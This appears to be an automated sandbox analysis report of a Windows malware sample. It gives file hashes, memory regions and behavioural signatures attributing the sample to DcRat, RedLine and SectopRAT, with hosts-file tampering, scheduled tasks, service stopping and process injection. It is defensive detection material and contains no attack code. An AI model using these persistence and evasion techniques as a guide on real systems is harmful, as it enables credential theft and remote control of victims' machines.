SHA512 f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

MD5 76764afd7b394cd6a9c36fa16d4c88fc
SHA1 5274a18139edf134230252c97652bfa6319b1a78
SHA256 e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA512 3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O1G5TO0HNJDRB4GSQX5L.temp

MD5 ec6743559327181472bf050aff1ee453
SHA1 843b1d4821324787df452a6e843c36701f5e3e9a
SHA256 2eacccc0f785d588152e85abb018151eee38149a6920aec322b638777910a999
SHA512 571f4b6275e11ab15052e9bd853aecc093c00a1cc5e947e1cc968f3542cd2377ee6782c6cfc875154b843acbe9bbad5a83fd2fa10d21acc12bcdc18d606ed9ba

C:\Users\Admin\AppData\Local\Temp\explorer.exe

MD5 19eab19c0d0a0b062c8eb85a94a79cc6
SHA1 3f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA256 02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512 550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

MD5 51ab765a1b1f884f936db4ffc642d728
SHA1 7b7741bf5dfeaed3860bf308733490017688fa46
SHA256 816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512 e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

memory/2852-31-0x0000000000C20000-0x0000000000C3E000-memory.dmp

C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

MD5 61b88edb5f6dca914ee05650653d8223
SHA1 4b61f3f21e8c981aaa73e375d090de82be46720d
SHA256 eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA512 1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

\driverPerf\cominto.exe

MD5 4344aa160852993fab07ae5793321886
SHA1 d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256 bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512 557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

memory/1804-42-0x0000000001060000-0x00000000012EE000-memory.dmp

memory/1804-43-0x00000000002C0000-0x00000000002CE000-memory.dmp

memory/2868-44-0x0000000000130000-0x0000000000351000-memory.dmp

memory/2608-46-0x000000001B550000-0x000000001B772000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2376-52-0x000000001B540000-0x000000001B822000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 e72f38579406c8bfc1e4c8b4c497bcce
SHA1 39ced7de061cd0aaf19948e95c540ad3391cfbf5
SHA256 b26699316a46e99ce6590b4d3fcd41275118254590174e778e3bbb207dd1b222
SHA512 cfeb6399d671e398d9824a058b21ff9111f4e517afdd7f7be50cdae3a4cbbbb96d7a5c7763847573a7742ee1d2fd341aaa22ec7cc260d5b1373e050414ca6d28

memory/2376-53-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

memory/2608-60-0x0000000001FE0000-0x0000000001FE6000-memory.dmp

memory/2556-75-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-73-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-71-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-67-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-65-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-63-0x0000000140000000-0x0000000140057000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 a29bfde7485c18bab1d5aaf31a7b7453
SHA1 8bd58665e33d49dbd9d814471031b7cbb8ef8f2d
SHA256 88289cee5a06a047d472c20607921a2ceec0ed434e9962802f498816bcf55c4b
SHA512 f78a0755f69fa0fd13c9cb07327b9c7a7af97eba203b38cd20a98f53b86e2cd09b7058b7e3e0d8b7a7f7f8401415b58a08fd1d9bb4b9fcd43ad6133154d72714

memory/784-99-0x0000000140000000-0x0000000140057000-memory.dmp

memory/784-97-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

memory/2556-69-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-61-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-78-0x0000000140000000-0x0000000140057000-memory.dmp

memory/2556-77-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

C:\Windows\Tasks\dialersvc64.job

MD5 ba3d478d76a03b6cae4dd27c3aed71e5
SHA1 14ebf1aee1163116150410cb2ce1b966f590b60e
SHA256 49ff5c6df4d05e7148a1fe6b133e261ed9f9fe96068226c392f5cbb14aebfaa5
SHA512 ccc62a5cb21d45e359ea1c4be9729bbbdb4ae2e8ffd4270795db26eacee005162a7f68e340055672afd1c25433a4885cd31abcef40f0765f50f187cef7121bd1

memory/3012-123-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/3012-122-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 25e23e93f073fd8006c31578c6541ace
SHA1 4eb06835f9e4fb2c2eeda279d9bbdb777542c0e1
SHA256 814d01a00d408bd0fbe158e9d1ab87b5a175ce5bcbcd17fb91d2d9e7fd836fee
SHA512 1bd6cd3064d43bab429ad2d51ade125217bf24786c79492afb7c707bdda521f4dab4a0cec2678eb411e3ae86309011a576a59767ad64129523b42cd54b558b69

memory/1780-130-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-138-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-142-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-141-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-140-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

memory/1780-136-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-134-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1780-132-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1792-159-0x0000000001C50000-0x0000000001C56000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-06 11:06

Reported

2024-11-06 11:09

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

148s

Command Line

winlogon.exe

Signatures

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Disables service(s)

evasion execution

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2500 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4308 set thread context of 4808 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 4340 set thread context of 836 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2500 set thread context of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4168 set thread context of 2492 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 1288 set thread context of 2500 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730891285" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
